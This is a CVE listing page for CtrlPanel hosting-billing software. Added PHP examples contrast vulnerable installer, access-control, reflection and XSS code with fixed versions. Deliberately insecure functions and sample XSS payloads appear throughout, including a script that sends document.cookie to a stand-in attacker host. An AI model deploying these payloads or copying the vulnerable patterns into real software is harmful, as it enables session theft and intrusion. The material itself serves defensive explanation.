Ctrlpanel-Gg Panel vulnerabilities
7 known vulnerabilities affecting ctrlpanel-gg/panel.

Total CVEs: 7
CISA KEV: 0
Public exploits: 1
Exploited in wild: 1
Severity breakdown: CRITICAL 1, HIGH 3, MEDIUM 3

Six of the seven entries below are fixed in 1.2.0; the remaining one (CVE-2025-25203) was fixed in 1.0, so an installation at 1.2.0 or later covers everything listed here.

Vulnerabilities
CVE-2026-34234 | CRITICAL (P1) | CVSS 10.0 | CWE-78 | Exploited, PoC available | fixed in 1.2.0 | 2026-05-19
CtrlPanel is open-source billing software for hosting providers. In versions 1.1.1 and prior, the web-based installer (public/installer/index.php) is vulnerable to unauthenticated Remote Code Execution (RCE) because it performs the install.lock check only after including and executing form handler files, leaving installer endpoints reachable on alr
Source: NVD
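The ordering bug described in the entry above, as an added illustration in plain PHP (this is not CtrlPanel's installer code; the step names, the handler closures and the request shape are assumed for the example): the vulnerable dispatcher loads and runs the step handler first and only then looks for install.lock, so a request to a step endpoint on an already-installed site still executes the handler with attacker-supplied input. The hardened version checks the lock before any handler is loaded and rejects steps that are not in an allowlist.

```php
<?php
declare(strict_types=1);

// Simulated step handlers standing in for the per-step files a web installer
// would include. They are closures here so the example runs on its own.
$handlers = [
    'database' => function (array $input): string {
        // A real installer writes these values into .env and runs migrations;
        // a handler that still runs after installation is the RCE surface.
        return 'database step executed with host=' . ($input['db_host'] ?? '');
    },
    'admin' => function (array $input): string {
        return 'admin user created: ' . ($input['email'] ?? '');
    },
];

// Vulnerable order: run the handler, then check the lock. By the time the
// lock is consulted the handler's side effects have already happened.
function installerVulnerable(string $lockPath, string $step, array $input, array $handlers): string
{
    $out = '';
    if (isset($handlers[$step])) {
        $out = $handlers[$step]($input);
    }
    if (file_exists($lockPath)) {
        return $out . ' (then: already installed, redirecting)';
    }
    return $out;
}

// Hardened order: the lock is the first thing checked, before any step file
// would be included, and unknown steps are refused rather than looked up.
function installerFixed(string $lockPath, string $step, array $input, array $handlers): string
{
    if (file_exists($lockPath)) {
        http_response_code(403);
        return 'already installed';
    }
    if (!array_key_exists($step, $handlers)) {
        http_response_code(404);
        return 'unknown step';
    }
    return $handlers[$step]($input);
}

// Constructed scenario: a site that has finished installing (lock file present)
// receiving a POST to the database step from an unauthenticated client.
$lock = tempnam(sys_get_temp_dir(), 'install.lock');
$post = ['db_host' => 'attacker.example', 'email' => 'x@example.com'];

echo installerVulnerable($lock, 'database', $post, $handlers), PHP_EOL;
echo installerFixed($lock, 'database', $post, $handlers), PHP_EOL;
unlink($lock);
```

A lock check inside the installer script is only the last line of defence. After installation the practical check is to request the installer path from outside and confirm it is gone or denied; removing the installer directory, or denying it at the web server, does not depend on the application getting the order of its checks right.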
CVE-2026-34358 | HIGH (P3) | CVSS 8.1 | CWE-284 | fixed in 1.2.0 | 2026-05-19
CtrlPanel is open-source billing software for hosting providers. Versions 1.1.1 and prior contain a broken access control vulnerability where multiple admin controllers enforce permission checks on form display methods but omit equivalent checks on the corresponding write methods, allowing any authenticated user to bypass RBAC via direct POST/PATCH r
Source: NVD
CVE-2026-34241 | HIGH (P3) | CVSS 8.7 | CWE-79 | fixed in 1.2.0 | 2026-05-19
CtrlPanel is open-source billing software for hosting providers. Versions 1.1.1 and prior contain a Stored Cross-Site Scripting (XSS) vulnerability in the ticket reply notification system. Unsanitized reply content ($newmessage) is stored directly in database notification payloads and later rendered unescaped via Blade's {!! !!} syntax in the recipient'
Source: NVD
CVE-2026-34216 | MEDIUM (P3) | CVSS 6.6 | CWE-470 | fixed in 1.2.0 | 2026-05-19
CtrlPanel is open-source billing software for hosting providers. In versions 1.1.1 and prior, the admin settings update endpoint accepted a fully qualified class name directly from user-supplied request input and used it for dynamic static method calls and object instantiation without any allowlist validation, allowing for authenticated Remote Code
Source: NVD
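An added plain-PHP sketch of the CWE-470 pattern in the entry above (the class names, the `settings_class` and `section` request fields and the `rules()`/`save()` methods are assumptions for the illustration and are not CtrlPanel's code): taking a class name from the request and using it for `$class::method()` and `new $class` lets the caller pick any class the autoloader can reach, including ones with constructors or static methods that were never meant to be triggered from a form. The fix maps a short request key to a server-owned allowlist and still verifies the resolved class against the expected interface before calling it.

```php
<?php
declare(strict_types=1);

interface SettingsSection
{
    public static function rules(): array;
    public function save(array $values): string;
}

final class GeneralSettings implements SettingsSection
{
    public static function rules(): array { return ['site_name' => 'required|string']; }
    public function save(array $values): string { return 'saved general: ' . json_encode($values); }
}

// A class that is loadable in the process but was never meant to be reachable
// from the settings form. It stands in for any class with a dangerous
// constructor or static method that an attacker could name in the request.
final class ShellRunner
{
    public static function rules(): array { return []; }
    public function __construct() { echo "[ShellRunner instantiated]", PHP_EOL; }
    public function save(array $values): string { return 'would run: ' . ($values['cmd'] ?? ''); }
}

// Vulnerable: the fully qualified class name comes straight from the request.
function updateSettingsVulnerable(array $request): string
{
    $class = $request['settings_class'];      // attacker-controlled string
    $rules = $class::rules();                 // dynamic static call
    $section = new $class();                  // dynamic instantiation
    return count($rules) . ' rules; ' . $section->save($request['values']);
}

// Hardened: the request selects a key, the server owns the class name, and the
// resolved class is checked against the interface before any call is made.
const SETTINGS_SECTIONS = [
    'general' => GeneralSettings::class,
];

function updateSettingsFixed(array $request): string
{
    $key = (string) ($request['section'] ?? '');
    if (!array_key_exists($key, SETTINGS_SECTIONS)) {
        return 'error: unknown settings section';
    }
    $class = SETTINGS_SECTIONS[$key];
    if (!is_subclass_of($class, SettingsSection::class)) {
        return 'error: not a settings section';
    }
    $rules = $class::rules();
    $section = new $class();
    return count($rules) . ' rules; ' . $section->save($request['values']);
}

// Constructed requests: one attacker-chosen class, one legitimate section,
// and one probe that tries the attacker's class name through the fixed path.
$attacker = ['settings_class' => 'ShellRunner', 'values' => ['cmd' => 'id']];
$legit    = ['section' => 'general', 'values' => ['site_name' => 'Example']];
$probe    = ['section' => 'ShellRunner', 'values' => ['cmd' => 'id']];

echo updateSettingsVulnerable($attacker), PHP_EOL;
echo updateSettingsFixed($legit), PHP_EOL;
echo updateSettingsFixed($probe), PHP_EOL;
```

The interface check matters even with the allowlist: it turns a mistaken entry in the map into a refused request rather than an arbitrary constructor call, and it fails closed if someone later widens the map to accept a class string again.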
CVE-2026-34233 | MEDIUM (P3) | CVSS 6.5 | CWE-284 | fixed in 1.2.0 | 2026-05-19
CtrlPanel is open-source billing software for hosting providers. In versions 1.1.1 and prior, multiple admin controllers expose DataTable endpoints without authorization checks, allowing any authenticated user to access sensitive administrative data that should be restricted to administrators only. The affected admin controllers define datatable() m
Source: NVD
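The two broken-access-control entries on this page (CVE-2026-34358 and CVE-2026-34233) come from the same shape of mistake: the permission check sits inside the method that renders the form, while the method that accepts the POST/PATCH, or the datatable() endpoint that serves the table's JSON, has none. An added plain-PHP sketch (not CtrlPanel's code; the controller, permission names, user model and request shape are assumptions) shows the bypass against a method-by-method check and the fix of enforcing authorization once, at the dispatch layer, for every action a controller exposes.

```php
<?php
declare(strict_types=1);

final class User
{
    public function __construct(public string $name, private array $permissions) {}

    public function can(string $permission): bool
    {
        return in_array($permission, $this->permissions, true);
    }
}

final class Forbidden extends RuntimeException {}

// Vulnerable controller: authorization only where the form is displayed.
final class UsersControllerVulnerable
{
    public function edit(User $actor, int $id): string
    {
        if (!$actor->can('admin.users.write')) {
            throw new Forbidden('403');
        }
        return "form for user $id";
    }

    public function update(User $actor, int $id, array $input): string
    {
        // No check here: a direct PATCH to the update route succeeds for anyone.
        return "user $id updated: role=" . ($input['role'] ?? '');
    }

    public function datatable(User $actor): string
    {
        // No check here either: the JSON behind the admin table is readable by all.
        return json_encode([['id' => 1, 'email' => 'owner@example.com']]);
    }
}

// Hardened: a per-action permission map is enforced by the dispatcher before
// the controller method runs, so a forgotten check inside one method cannot
// reopen an endpoint. Actions missing from the map are denied, not allowed.
final class UsersControllerFixed
{
    public const PERMISSIONS = [
        'edit'      => 'admin.users.write',
        'update'    => 'admin.users.write',
        'datatable' => 'admin.users.read',
    ];

    public function edit(User $actor, int $id): string { return "form for user $id"; }

    public function update(User $actor, int $id, array $input): string
    {
        return "user $id updated: role=" . ($input['role'] ?? '');
    }

    public function datatable(User $actor): string
    {
        return json_encode([['id' => 1, 'email' => 'owner@example.com']]);
    }
}

function dispatch(object $controller, string $action, User $actor, array $args): string
{
    $required = $controller::PERMISSIONS[$action] ?? null;
    if ($required === null || !$actor->can($required)) {
        throw new Forbidden("403 for $action");
    }
    return $controller->$action($actor, ...$args);
}

// Constructed actor: an ordinary customer with no admin permissions at all.
$customer = new User('customer', ['tickets.create']);
$vuln = new UsersControllerVulnerable();

try { $vuln->edit($customer, 1); } catch (Forbidden $e) { echo "edit: denied", PHP_EOL; }
echo 'update: ', $vuln->update($customer, 1, ['role' => 'admin']), PHP_EOL;   // bypass
echo 'datatable: ', $vuln->datatable($customer), PHP_EOL;                     // data leak

$fixed = new UsersControllerFixed();
$calls = ['edit' => [1], 'update' => [1, ['role' => 'admin']], 'datatable' => []];
foreach ($calls as $action => $args) {
    try {
        echo "$action: ", dispatch($fixed, $action, $customer, $args), PHP_EOL;
    } catch (Forbidden $e) {
        echo "$action: denied", PHP_EOL;
    }
}
```

In a Laravel application the equivalent is to attach the authorization as route or controller middleware rather than as an `if` at the top of selected methods. A quick audit for this class of bug is to list every route in the admin group and check that each one, including the ones that only return JSON for a table, runs through the same middleware as its form counterpart.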
CVE-2025-25203 | HIGH (P3) | CVSS 8.1 | CWE-79 | fixed in 1.0 | 2025-02-11
CtrlPanel is open-source billing software for hosting providers. Prior to version 1.0, a Cross-Site Scripting (XSS) vulnerability exists in the `TicketsController` and `Moderation/TicketsController` due to insufficient input validation on the `priority` field during ticket creation and unsafe rendering of this field in the moderator panel. Version 1.0 c
Source: NVD
CVE-2026-34246 | MEDIUM (P4) | CVSS 4.8 | CWE-80 | fixed in 1.2.0 | 2026-05-19
CtrlPanel is open-source billing software for hosting providers. Versions 1.1.1 and prior contain a Stored Cross-Site Scripting (XSS) vulnerability in the admin role management interface. In app/Http/Controllers/Admin/RoleController.php, the datatable() method interpolates $role->name and $role->color directly into an element's HTML and style at
Source: NVD
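The three XSS entries on this page (the ticket `priority` field rendered in the moderator panel, the ticket-reply notification rendered through `{!! !!}`, and the role name and color interpolated into a datatable cell) share one root cause: user data is written into HTML without encoding for the context it lands in. An added plain-PHP example (not CtrlPanel's code; the badge markup, the notification wrapper and the payloads are constructed for the illustration) shows the unsafe interpolation beside the safe version for three contexts: element text, a quoted attribute, and a CSS color inside a style attribute, where escaping alone is not enough and the value has to be validated against a strict pattern.

```php
<?php
declare(strict_types=1);

// Encode for element text and for double-quoted attribute values. ENT_QUOTES
// covers both quote characters, which is what closes an attribute early.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// A CSS value cannot be made safe by HTML escaping: "red;background:url(...)"
// passes through htmlspecialchars untouched. Accept only a six-digit hex color
// and fall back to a default otherwise.
function safeColor(string $color, string $default = '#6c757d'): string
{
    return preg_match('/^#[0-9a-fA-F]{6}$/', $color) === 1 ? $color : $default;
}

// Vulnerable: raw interpolation, equivalent to Blade {!! !!} or to building
// HTML strings inside a datatable() callback.
function roleBadgeVulnerable(string $name, string $color): string
{
    return "<span class=\"badge\" style=\"background-color: $color\">$name</span>";
}

function roleBadgeSafe(string $name, string $color): string
{
    return '<span class="badge" style="background-color: ' . safeColor($color) . '">'
        . h($name) . '</span>';
}

// Vulnerable: a notification body stored raw and echoed unescaped later.
function notificationVulnerable(string $message): string
{
    return '<div class="notification">' . $message . '</div>';
}

function notificationSafe(string $message): string
{
    // Storing the raw text is fine; rendering it raw is the bug. Escape at
    // output and convert newlines after escaping so the <br> tags are ours.
    return '<div class="notification">' . nl2br(h($message)) . '</div>';
}

// Constructed payloads of the kind a low-privileged user could submit through
// a role name, a color picker field, or a ticket reply.
$name    = '<img src=x onerror=alert(document.cookie)>';
$color   = 'red" onmouseover="alert(1)';
$message = "Thanks!\n<script>fetch('https://attacker.example/?c=' + document.cookie)</script>";

echo roleBadgeVulnerable($name, $color), PHP_EOL;
echo roleBadgeSafe($name, $color), PHP_EOL;
echo notificationVulnerable($message), PHP_EOL;
echo notificationSafe($message), PHP_EOL;
```

In Blade, `{{ }}` applies the same escaping as `h()` above and `{!! !!}` applies none, so a `{!! !!}` around anything that originated in a request is the line to look for in a review. For an enumerated field such as `priority`, validate the value against the allowed set on the way in as well; output encoding still has to happen, but a rejected value never reaches the database in the first place.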